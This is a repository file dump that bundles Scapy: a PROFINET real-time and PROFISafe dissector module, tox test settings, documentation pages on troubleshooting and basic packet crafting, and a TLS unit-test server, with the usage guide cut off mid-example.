\"controller\"]),\n XBitField(\"reserved\", 0, 4),\n BitField(\"extension\", 0, 1),\n ]\n\n def extract_padding(self, s):\n return None, s # No extra payload\n\n\nclass PNIORealTimeRawData(Packet):\n \"\"\"Raw data packets for PROFINET Real-Time payload.\n\n It's a configurable packet whose config only includes a fix length. 
The\n config parameter must then be a dict {\"length\": X}.\n\n PROFINET IO specification impose this packet to be followed with an IOPS\n (PNIORealTimeIOxS)\"\"\"\n __slots__ = [\"_config\"]\n name = \"PNIO RTC Raw data\"\n fields_desc = [\n StrFixedLenField(\"load\", \"\", length_from=lambda p: p[PNIORealTimeRawData].length()),\n ]\n\n def __init__(self, _pkt=\"\", post_transform=None, _internal=0, _underlayer=None, config=None, **fields):\n \"\"\"\n length=None means that the length must be managed by the user. If it's\n defined, the field will always be length-long (padded with b\"\\\\x00\" if\n needed)\n \"\"\"\n self._config = config\n Packet.__init__(self, _pkt=_pkt, post_transform=post_transform,\n _internal=_internal, _underlayer=_underlayer, **fields)\n\n def copy(self):\n pkt = Packet.copy(self)\n pkt._config = self._config\n return pkt\n\n def clone_with(self, *args, **kargs):\n pkt = Packet.clone_with(self, *args, **kargs)\n pkt._config = self._config\n return pkt\n\n def length(self):\n \"\"\"Get the length of the raw data\"\"\"\n # Manage the length of the packet if a length is provided\n return self._config[\"length\"]\n\n\n# Make sure an IOPS follows a data\nbind_layers(PNIORealTimeRawData, PNIORealTimeIOxS)\n\n\n###############################\n# PROFINET Real-Time Fields #\n###############################\n\nclass LowerLayerBoundPacketListField(PacketListField):\n \"\"\"PacketList which binds each underlayer of packets to the current pkt\"\"\"\n\n def m2i(self, pkt, m):\n return self.cls(m, _underlayer=pkt)\n\n\nclass NotionalLenField(Field):\n \"\"\"A len fields which isn't present in the machine representation, but is\n computed from a given lambda\"\"\"\n __slots__ = [\"length_from\", \"count_from\"]\n\n def __init__(self, name, default, length_from=None, count_from=None):\n Field.__init__(self, name, default)\n self.length_from = length_from\n self.count_from = count_from\n\n def addfield(self, pkt, s, val):\n return s # Isn't present in the machine packet\n\n def getfield(self, pkt, s):\n val = None\n if self.length_from is not None:\n val = self.length_from(pkt, s)\n elif self.count_from is not None:\n val = self.count_from(pkt, s)\n return s, val\n\n\n###############################\n# PNIORealTime Configuration #\n###############################\n\n# conf.contribs[\"PNIO_RTC\"] is a dict which contains data layout for each Ethernet\n# communications. 
It must be formatted as such:\n# {(Ether.src, Ether.dst): [(start, type, config), ...]}\n# start: index of a data field from the END of the data buffer (-1, -2, ...)\n# type: class to be instanciated to represent these data\n# config: a config dict, given to the type class constructor\nconf.contribs[\"PNIO_RTC\"] = {}\n\n\ndef _get_ethernet(pkt):\n \"\"\"Find the Ethernet packet of underlayer or None\"\"\"\n ether = pkt\n while ether is not None and not isinstance(ether, Ether):\n ether = ether.underlayer\n return ether\n\n\ndef pnio_update_config(config):\n \"\"\"Update the PNIO RTC config\"\"\"\n conf.contribs[\"PNIO_RTC\"].update(config)\n\n\ndef pnio_get_config(pkt):\n \"\"\"Retrieve the config for a given communication\"\"\"\n # get the config based on the tuple (Ether.src, Ether.dst)\n ether = _get_ethernet(pkt)\n config = None\n if ether is not None and (ether.src, ether.dst) in conf.contribs[\"PNIO_RTC\"]:\n config = conf.contribs[\"PNIO_RTC\"][(ether.src, ether.dst)]\n\n return config\n\n\n###############################\n# PROFINET Real-Time Packet #\n###############################\n\ndef _pnio_rtc_guess_payload_class(_pkt, _underlayer=None, *args, **kargs):\n \"\"\"A dispatcher for the packet list field which manage the configuration\n to fin dthe appropriate class\"\"\"\n config = pnio_get_config(_underlayer)\n\n if isinstance(config, list):\n # If we have a valid config, it's a list which describe each data\n # packets the rest being IOCS\n cur_index = -len(_pkt)\n for index, cls, params in config:\n if cur_index == index:\n return cls(_pkt, config=params, *args, **kargs)\n\n # Not a data => IOCS packet\n return PNIORealTimeIOxS(_pkt, *args, **kargs)\n else:\n # No config => Raw data which dissect the whole _pkt\n return PNIORealTimeRawData(_pkt,\n config={\"length\": len(_pkt)},\n *args, **kargs\n )\n\n\n_PNIO_DS_FLAGS = [\n \"primary\",\n \"redundancy\",\n \"validData\",\n \"reserved_1\",\n \"run\",\n \"no_problem\",\n \"reserved_2\",\n \"ignore\",\n]\n\n\nclass PNIORealTime(Packet):\n \"\"\"PROFINET cyclic real-time\"\"\"\n name = \"PROFINET Real-Time\"\n fields_desc = [\n NotionalLenField(\"len\", None, length_from=lambda p, s: len(s)),\n NotionalLenField(\"dataLen\", None, length_from=lambda p, s: len(s[:-4].rstrip(b\"\\0\"))),\n LowerLayerBoundPacketListField(\"data\", [], _pnio_rtc_guess_payload_class, length_from=lambda p: p.dataLen),\n StrFixedLenField(\"padding\", \"\", length_from=lambda p: p[PNIORealTime].padding_length()),\n ShortField(\"cycleCounter\", 0),\n FlagsField(\"dataStatus\", 0x35, 8, _PNIO_DS_FLAGS),\n ByteField(\"transferStatus\", 0)\n ]\n overload_fields = {\n ProfinetIO: {\"frameID\": 0x8000}, # RT_CLASS_1\n }\n\n def padding_length(self):\n \"\"\"Compute the length of the padding need for the ethernet frame\"\"\"\n fld, val = self.getfield_and_val(\"data\")\n\n # use the len field if available to define the padding length, eg for\n # dissected packets\n pkt_len = self.getfieldval(\"len\")\n if pkt_len is not None:\n return max(0, pkt_len - len(fld.addfield(self, b\"\", val)) - 4)\n\n if isinstance(self.underlayer, ProfinetIO) and \\\n isinstance(self.underlayer.underlayer, UDP):\n return max(0, 12 - len(fld.addfield(self, b\"\", val)))\n else:\n return max(0, 40 - len(fld.addfield(self, b\"\", val)))\n\n @staticmethod\n def analyse_data(packets):\n \"\"\"Analyse the data to find heuristical properties and determine\n location and type of data\"\"\"\n loc = PNIORealTime.find_data(packets)\n loc = PNIORealTime.analyse_profisafe(packets, loc)\n 
pnio_update_config(loc)\n        return loc\n\n    @staticmethod\n    def find_data(packets):\n        \"\"\"Analyse a packet list to extract data offsets from packets data.\"\"\"\n        # a dictionary to count data offsets (ie != 0x80)\n        # It's formatted: {(src, dst): (total, [count for offset in len])}\n        heuristic = {}\n\n        # Counts possible data locations\n        # 0x80 are mainly IOxS and trailing 0x00s are just padding\n        for pkt in packets:\n            if PNIORealTime in pkt:\n                pdu = bytes(pkt[PNIORealTime])[:-4].rstrip(b\"\\0\")\n\n                if (pkt.src, pkt.dst) not in heuristic:\n                    heuristic[(pkt.src, pkt.dst)] = (0, [])\n\n                total, counts = heuristic[(pkt.src, pkt.dst)]\n\n                if len(counts) < len(pdu):\n                    counts.extend([0 for _ in range(len(pdu) - len(counts))])\n\n                for i in range(len(pdu)):\n                    if orb(pdu[i]) != 0x80:\n                        counts[i] += 1\n\n                comm = (pkt.src, pkt.dst)\n                heuristic[comm] = (total + 1, counts)\n\n        # Determine data locations\n        locations = {}\n        for comm in heuristic:\n            total, counts = heuristic[comm]\n            length = len(counts)\n            loc = locations[comm] = []\n            start = None\n            for i in range(length):\n                if counts[i] > total // 2:  # Data if more than half is != 0x80\n                    if start is None:\n                        start = i\n                else:\n                    if start is not None:\n                        loc.append((\n                            start - length,\n                            PNIORealTimeRawData,\n                            {\"length\": i - start}\n                        ))\n                        start = None\n\n        return locations\n\n    @staticmethod\n    def analyse_profisafe(packets, locations=None):\n        \"\"\"Analyse a packet list to find possible PROFISafe profiles.\n\n        It's based on a heuristic analysis of each payload to try to find\n        CRC and control/status byte.\n\n        locations: possible data locations. If not provided, analyse_pn_rt will\n            be called beforehand. 
If not given, it calls in the same time\n analyse_data which update the configuration of the data field\"\"\"\n if not locations:\n locations = PNIORealTime.find_data(packets)\n\n # Retrieve the entropy of each data byte, for each communication\n entropies = {}\n for comm in locations:\n if len(locations[comm]) > 0: # Doesn't append empty data\n entropies[comm] = []\n comm_packets = []\n\n # fetch all packets from the communication\n for pkt in packets:\n if PNIORealTime in pkt and (pkt.src, pkt.dst) == comm:\n comm_packets.append(\n bytes(pkt[PNIORealTime])[:-4].rstrip(b\"\\0\")\n )\n\n # Get the entropy\n for start, dummy, config in locations[comm]:\n for i in range(start, start + config[\"length\"]):\n entropies[comm].append(\n (i, entropy_of_byte(comm_packets, i))\n )\n\n return entropies\n\n @staticmethod\n def draw_entropy(packets, locations=None):\n \"\"\"Plot the entropy of each data byte of PN RT communication\"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.cm as cm\n entropies = PNIORealTime.data_entropy(packets, locations)\n\n rows = len(entropies)\n cur_row = 1\n for comm in entropies:\n index = []\n vals = []\n for i, ent in entropies[comm]:\n index.append(i)\n vals.append(ent)\n\n # Offsets the indexes to get the index from the beginning\n offset = -min(index)\n index = [i + offset for i in index]\n\n plt.subplot(rows, 1, cur_row)\n plt.bar(index, vals, 0.8, color=\"r\")\n plt.xticks([i + 0.4 for i in index], index)\n plt.title(\"Entropy from %s to %s\" % comm)\n cur_row += 1\n plt.ylabel(\"Shannon Entropy\")\n\n plt.xlabel(\"Byte offset\") # x label only on the last row\n plt.legend()\n\n plt.tight_layout()\n plt.show()\n\n\ndef entropy_of_byte(packets, position):\n \"\"\"Compute the entropy of a byte at a given offset\"\"\"\n counter = [0 for _ in range(256)]\n\n # Count each byte a appearance\n for pkt in packets:\n if -position <= len(pkt): # position must be a negative index\n counter[orb(pkt[position])] += 1\n\n # Compute the Shannon entropy\n entropy = 0\n length = len(packets)\n for count in counter:\n if count > 0:\n ratio = float(count) / length\n entropy -= ratio * math.log(ratio, 2)\n\n return entropy\n\n###############\n# PROFISafe #\n###############\n\n\nclass XVarBytesField(XByteField):\n \"\"\"Variable length bytes field, from 0 to 8 bytes\"\"\"\n __slots__ = [\"length_from\"]\n\n def __init__(self, name, default, length=None, length_from=None):\n self.length_from = length_from\n if length:\n self.length_from = lambda p, l=length: l\n Field.__init__(self, name, default, \"!Q\")\n\n def addfield(self, pkt, s, val):\n length = self.length_from(pkt)\n return s + struct.pack(self.fmt, self.i2m(pkt, val))[8 - length:]\n\n def getfield(self, pkt, s):\n length = self.length_from(pkt)\n val = struct.unpack(self.fmt, b\"\\x00\" * (8 - length) + s[:length])[0]\n return s[length:], self.m2i(pkt, val)\n\n\nclass Profisafe(PNIORealTimeRawData):\n \"\"\"PROFISafe profil to be encapsulated inside the PNRT.data list.\n\n It's a configurable packet whose config includes a fix length, and a CRC\n length. 
The config parameter must then be a dict {\"length\": X, \"CRC\": Y}.\n \"\"\"\n name = \"PROFISafe\"\n fields_desc = [\n StrFixedLenField(\"load\", \"\", length_from=lambda p: p[Profisafe].data_length()),\n XByteField(\"Control_Status\", 0),\n XVarBytesField(\"CRC\", 0, length_from=lambda p: p[Profisafe].crc_length())\n ]\n\n def data_length(self):\n \"\"\"Return the length of the data\"\"\"\n ret = self.length() - self.crc_length() - 1\n return ret\n\n def crc_length(self):\n \"\"\"Return the length of the crc\"\"\"\n return self._config[\"CRC\"]\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "b71aeeef54dd16cfa5629997a924cbdfcc81af94", "content_id": "6f983c7a7f072976606f936850d4ddd4c6efbecd", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/run_scapy_py3", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python3\n. $(dirname $0)/run_scapy \"$@\"\n" }, { "alpha_fraction": 0.6525307893753052, "alphanum_fraction": 0.6771546006202698, "avg_line_length": 21.78125, "blob_id": "545f146b43378a43c594abb674397717ef07c845", "content_id": "d7af30b880daa8983b04ff52c5d316c8b1706407", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 731, "license_type": "permissive", "max_line_length": 93, "num_lines": 32, "path": "/scapy/doc/scapy/index.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": ".. Scapy documentation master file, created by sphinx-quickstart on Mon Sep 8 19:37:39 2008.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to Scapy's documentation!\n=================================\n\n.. image:: graphics/scapy_logo.png\n :scale: 20\n :align: center\n\n:Release: |version|\n:Date: |today|\n\nThis document is under a `Creative Commons Attribution - Non-Commercial \n- Share Alike 2.5 <http://creativecommons.org/licenses/by-nc-sa/2.5/>`_ license.\n\n.. toctree::\n :maxdepth: 2\n \n introduction\n installation\n \n usage\n advanced_usage\n extending\n build_dissect\n functions\n\n troubleshooting\n development\n backmatter\n \n" }, { "alpha_fraction": 0.7300000190734863, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 43.33333206176758, "blob_id": "5b7cbaed4df368c46b8a92749082529b2421e138", "content_id": "f316bb2a879cc3bfc8ec4c8c2aa1ba557e68440f", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 400, "license_type": "permissive", "max_line_length": 82, "num_lines": 9, "path": "/scapy/doc/scapy/backmatter.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "\n*********\nCredits\n*********\n\n- Philippe Biondi is Scapy's author. 
He has also written most of the documentation.\n- Pierre Lalet, Gabriel Potter, Guillaume Valadon are the current most active maintainers and contributors.\n- Fred Raynal wrote the chapter on building and dissecting packets.\n- Peter Kacherginsky contributed several tutorial sections, one-liners and recipes.\n- Dirk Loss integrated and restructured the existing docs to make this book.\n" }, { "alpha_fraction": 0.680196225643158, "alphanum_fraction": 0.7087422013282776, "avg_line_length": 32.46268844604492, "blob_id": "4c449395ceef504c5e18f7ed9a239c275b017330", "content_id": "97374c06a34cad5a767c6557226026e204f54e16", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 2242, "license_type": "permissive", "max_line_length": 189, "num_lines": 67, "path": "/scapy/tox.ini", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Scapy tox configuration file\n# Copyright (C) 2018 Guillaume Valadon <guillaume@valadon.net>\n\n\n[tox]\nenvlist = py{27,34,35,36,py,py3}-{linux,osx}_{non_root,root}\nskip_missing_interpreters = true\nminversion = 2.9\n\n\n[testenv:py27-pcapdnet_root]\ndescription = \"Scapy unit tests - pcap & dnet\"\nwhitelist_externals = {[testenv]whitelist_externals}\nsetenv = {[testenv]setenv}\npassenv = SCAPY_USE_PCAPDNET\ndeps = mock\n cryptography\n coverage\n # Currently pcap & dnet are tested together. As pydumbnet does not\n # support Python3 yet, both are currently disabled.\n pcapy>=0.11.3\n pydumbnet\ncommands =\n sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/osx.utsc -T test/bpf.uts -K manufdb -K tshark -K random_weird_py3 -K osx {posargs}\n\n\n[testenv]\ndescription = \"Scapy unit tests\"\nwhitelist_externals = sudo\nsetenv = SCAPY_ROOT_DIR={env:PWD}\ndeps = mock\n {py27,py34,py35,py36}: cryptography\n coverage\n python-can\n\nplatform =\n linux_non_root,linux_root: linux\n osx_non_root,osx_root: darwin\n\ncommands =\n linux_non_root: coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 -K netaccess -K needs_root {posargs}\n linux_root: sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs}\n osx_non_root: coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c test/configs/osx.utsc -K manufdb -K tshark -K random_weird_py3 -K netaccess -K needs_root {posargs}\n osx_root: sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c test/configs/osx.utsc -K manufdb -K tshark -K random_weird_py3 {posargs}\n coverage combine\n\n\n[testenv:codecov]\ndescription = \"Upload coverage results to codecov\"\npassenv = TOXENV CI TRAVIS TRAVIS_*\ndeps = codecov\ncommands = codecov -e TOXENV\n\n\n[testenv:flake8]\ndescription = \"Check Scapy code style & quality\"\nskip_install = true\ndeps = flake8\ncommands = flake8 scapy/\n\n# flake8 configuration\n[flake8]\nselect = E1,E2,E30,E401,E502,E70,E71,\n F82,F402,F841,\n W2,W3\nexclude = scapy/modules/six.py,\n scapy/modules/winpcapy.py\n" }, { "alpha_fraction": 0.6384180784225464, "alphanum_fraction": 0.6622063517570496, "avg_line_length": 45.0684928894043, "blob_id": "062566adeb53711cb1ba311ca8053287a66d68ac", "content_id": "0aaf6ddb997adbf955a876ec00c49d1ef22630b7", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", 
"GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3363, "license_type": "permissive", "max_line_length": 516, "num_lines": 73, "path": "/scapy/doc/scapy/troubleshooting.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "***************\nTroubleshooting\n***************\n\nFAQ\n===\n\nMy TCP connections are reset by Scapy or by my kernel.\n------------------------------------------------------\nThe kernel is not aware of what Scapy is doing behind his back. If Scapy sends a SYN, the target replies with a SYN-ACK and your kernel sees it, it will reply with a RST. To prevent this, use local firewall rules (e.g. NetFilter for Linux). Scapy does not mind about local firewalls.\n\nI can't ping 127.0.0.1. Scapy does not work with 127.0.0.1 or on the loopback interface \n---------------------------------------------------------------------------------------\n\nThe loopback interface is a very special interface. Packets going through it are not really assembled and disassembled. The kernel routes the packet to its destination while it is still stored an internal structure. What you see with tcpdump -i lo is only a fake to make you think everything is normal. The kernel is not aware of what Scapy is doing behind his back, so what you see on the loopback interface is also a fake. Except this one did not come from a local structure. Thus the kernel will never receive it.\n\nIn order to speak to local applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux)::\n\n >>> conf.L3socket\n <class __main__.L3PacketSocket at 0xb7bdf5fc>\n >>> conf.L3socket=L3RawSocket\n >>> sr1(IP(dst=\"127.0.0.1\")/ICMP())\n <IP version=4L ihl=5L tos=0x0 len=28 id=40953 flags= frag=0L ttl=64 proto=ICMP chksum=0xdce5 src=127.0.0.1 dst=127.0.0.1 options='' |<ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 |>>\n\nBPF filters do not work. I'm on a ppp link\n------------------------------------------\n\nThis is a known bug. BPF filters must compiled with different offsets on ppp links. It may work if you use libpcap (which will be used to compile the BPF filter) instead of using native linux support (PF_PACKET sockets).\n\ntraceroute() does not work. I'm on a ppp link\n---------------------------------------------\n\nThis is a known bug. See BPF filters do not work. 
I'm on a ppp link\n\nTo work around this, use ``nofilter=1``::\n\n >>> traceroute(\"target\", nofilter=1)\n\n\nGraphs are ugly/fonts are too big/image is truncated.\n-----------------------------------------------------\n\nQuick fix: use png format::\n\n >>> x.graph(format=\"png\")\n \nUpgrade to latest version of GraphViz.\n\nTry providing different DPI options (50,70,75,96,101,125, for instance)::\n\n >>> x.graph(options=\"-Gdpi=70\")\n\nIf it works, you can make it permanenent::\n\n >>> conf.prog.dot = \"dot -Gdpi=70\"\n\nYou can also put this line in your ``~/.scapy_startup.py`` file \n\n\nGetting help\n============\n\nCommon problems are answered in the FAQ.\n\nIf you need additional help, please check out:\n\n* The `Gitter channel <https://gitter.im/secdev/scapy>`_\n* The `GitHub repository <https://github.com/secdev/scapy/>`_\n\nThere's also a low traffic mailing list at ``scapy.ml(at)secdev.org`` (`archive <http://news.gmane.org/gmane.comp.security.scapy.general>`_, `RSS, NNTP <http://gmane.org/info.php?group=gmane.comp.security.scapy.general>`_).\nSubscribe by sending a mail to ``scapy.ml-subscribe(at)secdev.org``.\n\nYou are encouraged to send questions, bug reports, suggestions, ideas, cool usages of Scapy, etc.\n" }, { "alpha_fraction": 0.6263157725334167, "alphanum_fraction": 0.6298245787620544, "avg_line_length": 30.66666603088379, "blob_id": "382f886d89dee74f697bdcee772ff9932cac6588", "content_id": "42848bc771c056defb977c65470e0466ee9bb2d8", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2280, "license_type": "permissive", "max_line_length": 86, "num_lines": 72, "path": "/scapy/test/tls/travis_test_server.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nTLS server used in unit tests.\n\nWhen some expected_data is provided, a TLS client (e.g. openssl s_client)\nshould send some application data after the handshake. If this data matches our\nexpected_data, then we leave with exit code 0. 
Else we leave with exit code 1.\nIf no expected_data was provided and the handshake was ok, we exit with 0.\n\"\"\"\n\nfrom ast import literal_eval\nimport os\nimport sys\nfrom contextlib import contextmanager\nfrom io import BytesIO, StringIO\n\nfrom scapy.modules import six\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\n os.path.pardir, os.path.pardir))\nsys.path = [basedir] + sys.path\n\nfrom scapy.layers.tls.automaton_srv import TLSServerAutomaton\n\n\n@contextmanager\ndef captured_output():\n new_out, new_err = (StringIO(), StringIO()) if six.PY3 else (BytesIO(), BytesIO())\n old_out, old_err = sys.stdout, sys.stderr\n try:\n sys.stdout, sys.stderr = new_out, new_err\n yield sys.stdout, sys.stderr\n finally:\n sys.stdout, sys.stderr = old_out, old_err\n\ndef check_output_for_data(out, err, expected_data):\n errored = err.getvalue()\n if errored:\n return (False, errored)\n output = out.getvalue().strip()\n if expected_data:\n for data in output.split('> Received: ')[1:]:\n for line in literal_eval(data).split(b'\\n'):\n if line == expected_data:\n return (True, output)\n return (False, output)\n else:\n return (True, None)\n\ndef run_tls_test_server(expected_data, q):\n correct = False\n with captured_output() as (out, err):\n # Prepare automaton\n crt_basedir = os.path.join(basedir, 'test', 'tls', 'pki')\n t = TLSServerAutomaton(mycert=os.path.join(crt_basedir, 'srv_cert.pem'),\n mykey=os.path.join(crt_basedir, 'srv_key.pem'))\n # Sync threads\n q.put(True)\n # Run server automaton\n t.run()\n # Return correct answer\n correct, out_e = check_output_for_data(out, err, expected_data)\n # Return data\n q.put(out_e)\n if correct:\n sys.exit(0)\n else:\n sys.exit(1)\n" }, { "alpha_fraction": 0.47298574447631836, "alphanum_fraction": 0.6070298552513123, "avg_line_length": 41.41984558105469, "blob_id": "ee2788e404ee65ee41890f011c882b550f35c351", "content_id": "da7df77a2e73107b9e2b6cb3184a8270cd8f0000", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 66717, "license_type": "permissive", "max_line_length": 638, "num_lines": 1572, "path": "/scapy/doc/scapy/usage.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "*****\nUsage\n*****\n\nStarting Scapy\n==============\n\nScapy's interactive shell is run in a terminal session. Root privileges are needed to\nsend the packets, so we're using ``sudo`` here::\n \n $ sudo ./scapy\n Welcome to Scapy (2.4.0)\n >>> \n\nOn Windows, please open a command prompt (``cmd.exe``) and make sure that you have \nadministrator privileges::\n\n C:\\>scapy\n Welcome to Scapy (2.4.0)\n >>>\n\nIf you do not have all optional packages installed, Scapy will inform you that \nsome features will not be available:: \n \n INFO: Can't import python gnuplot wrapper . Won't be able to plot.\n INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().\n\nThe basic features of sending and receiving packets should still work, though. \n\nScreenshot\n----------\n\nIf you have installed IPython, scapy will hook to it and you will be able to use auto-completion using the TAB.\n\n.. 
image:: graphics/scapy-main-console.png\n :align: center\n\n\nInteractive tutorial\n====================\n\nThis section will show you several of Scapy's features.\nJust open a Scapy session as shown above and try the examples yourself.\n\n\nFirst steps\n-----------\n\nLet's build a packet and play with it::\n\n >>> a=IP(ttl=10) \n >>> a \n < IP ttl=10 |> \n >>> a.src \n ’127.0.0.1’ \n >>> a.dst=\"192.168.1.1\" \n >>> a \n < IP ttl=10 dst=192.168.1.1 |> \n >>> a.src \n ’192.168.8.14’ \n >>> del(a.ttl) \n >>> a \n < IP dst=192.168.1.1 |> \n >>> a.ttl \n 64 \n\nStacking layers\n---------------\n\nThe ``/`` operator has been used as a composition operator between two layers. When doing so, the lower layer can have one or more of its defaults fields overloaded according to the upper layer. (You still can give the value you want). A string can be used as a raw layer.\n\n::\n\n >>> IP()\n <IP |>\n >>> IP()/TCP()\n <IP frag=0 proto=TCP |<TCP |>>\n >>> Ether()/IP()/TCP()\n <Ether type=0x800 |<IP frag=0 proto=TCP |<TCP |>>>\n >>> IP()/TCP()/\"GET / HTTP/1.0\\r\\n\\r\\n\"\n <IP frag=0 proto=TCP |<TCP |<Raw load='GET / HTTP/1.0\\r\\n\\r\\n' |>>>\n >>> Ether()/IP()/IP()/UDP()\n <Ether type=0x800 |<IP frag=0 proto=IP |<IP frag=0 proto=UDP |<UDP |>>>>\n >>> IP(proto=55)/TCP()\n <IP frag=0 proto=55 |<TCP |>>\n\n\n.. image:: graphics/fieldsmanagement.png\n :scale: 90\n\nEach packet can be build or dissected (note: in Python ``_`` (underscore) is the latest result)::\n\n >>> raw(IP())\n 'E\\x00\\x00\\x14\\x00\\x01\\x00\\x00@\\x00|\\xe7\\x7f\\x00\\x00\\x01\\x7f\\x00\\x00\\x01'\n >>> IP(_)\n <IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=IP\n chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |>\n >>> a=Ether()/IP(dst=\"www.slashdot.org\")/TCP()/\"GET /index.html HTTP/1.0 \\n\\n\"\n >>> hexdump(a) \n 00 02 15 37 A2 44 00 AE F3 52 AA D1 08 00 45 00 ...7.D...R....E.\n 00 43 00 01 00 00 40 06 78 3C C0 A8 05 15 42 23 .C....@.x<....B#\n FA 97 00 14 00 50 00 00 00 00 00 00 00 00 50 02 .....P........P.\n 20 00 BB 39 00 00 47 45 54 20 2F 69 6E 64 65 78 ..9..GET /index\n 2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A .html HTTP/1.0 .\n 0A .\n >>> b=raw(a)\n >>> b\n '\\x00\\x02\\x157\\xa2D\\x00\\xae\\xf3R\\xaa\\xd1\\x08\\x00E\\x00\\x00C\\x00\\x01\\x00\\x00@\\x06x<\\xc0\n \\xa8\\x05\\x15B#\\xfa\\x97\\x00\\x14\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x02 \\x00\n \\xbb9\\x00\\x00GET /index.html HTTP/1.0 \\n\\n'\n >>> c=Ether(b)\n >>> c\n <Ether dst=00:02:15:37:a2:44 src=00:ae:f3:52:aa:d1 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=TCP chksum=0x783c\n src=192.168.5.21 dst=66.35.250.151 options='' |<TCP sport=20 dport=80 seq=0L\n ack=0L dataofs=5L reserved=0L flags=S window=8192 chksum=0xbb39 urgptr=0\n options=[] |<Raw load='GET /index.html HTTP/1.0 \\n\\n' |>>>>\n\nWe see that a dissected packet has all its fields filled. That's because I consider that each field has its value imposed by the original string. If this is too verbose, the method hide_defaults() will delete every field that has the same value as the default::\n\n >>> c.hide_defaults()\n >>> c\n <Ether dst=00:0f:66:56:fa:d2 src=00:ae:f3:52:aa:d1 type=0x800 |<IP ihl=5L len=67\n frag=0 proto=TCP chksum=0x783c src=192.168.5.21 dst=66.35.250.151 |<TCP dataofs=5L\n chksum=0xbb39 options=[] |<Raw load='GET /index.html HTTP/1.0 \\n\\n' |>>>>\n\nReading PCAP files\n------------------\n\n.. index::\n single: rdpcap()\n\nYou can read packets from a pcap file and write them to a pcap file. 
\n\n >>> a=rdpcap(\"/spare/captures/isakmp.cap\")\n >>> a\n <isakmp.cap: UDP:721 TCP:0 ICMP:0 Other:0>\n\nGraphical dumps (PDF, PS)\n-------------------------\n\n.. index::\n single: pdfdump(), psdump()\n\nIf you have PyX installed, you can make a graphical PostScript/PDF dump of a packet or a list of packets (see the ugly PNG image below. PostScript/PDF are far better quality...)::\n\n >>> a[423].pdfdump(layer_shift=1)\n >>> a[423].psdump(\"/tmp/isakmp_pkt.eps\",layer_shift=1)\n \n.. image:: graphics/isakmp_dump.png\n\n\n\n======================= ====================================================\nCommand Effect\n======================= ====================================================\nraw(pkt) assemble the packet\nhexdump(pkt) have a hexadecimal dump \nls(pkt) have the list of fields values \npkt.summary() for a one-line summary \npkt.show() for a developed view of the packet \npkt.show2() same as show but on the assembled packet (checksum is calculated, for instance) \npkt.sprintf() fills a format string with fields values of the packet \npkt.decode_payload_as() changes the way the payload is decoded \npkt.psdump() draws a PostScript diagram with explained dissection \npkt.pdfdump() draws a PDF with explained dissection \npkt.command() return a Scapy command that can generate the packet \n======================= ====================================================\n\n\n\nGenerating sets of packets\n--------------------------\n\nFor the moment, we have only generated one packet. Let see how to specify sets of packets as easily. Each field of the whole packet (ever layers) can be a set. This implicitly defines a set of packets, generated using a kind of cartesian product between all the fields.\n\n::\n\n >>> a=IP(dst=\"www.slashdot.org/30\")\n >>> a\n <IP dst=Net('www.slashdot.org/30') |>\n >>> [p for p in a]\n [<IP dst=66.35.250.148 |>, <IP dst=66.35.250.149 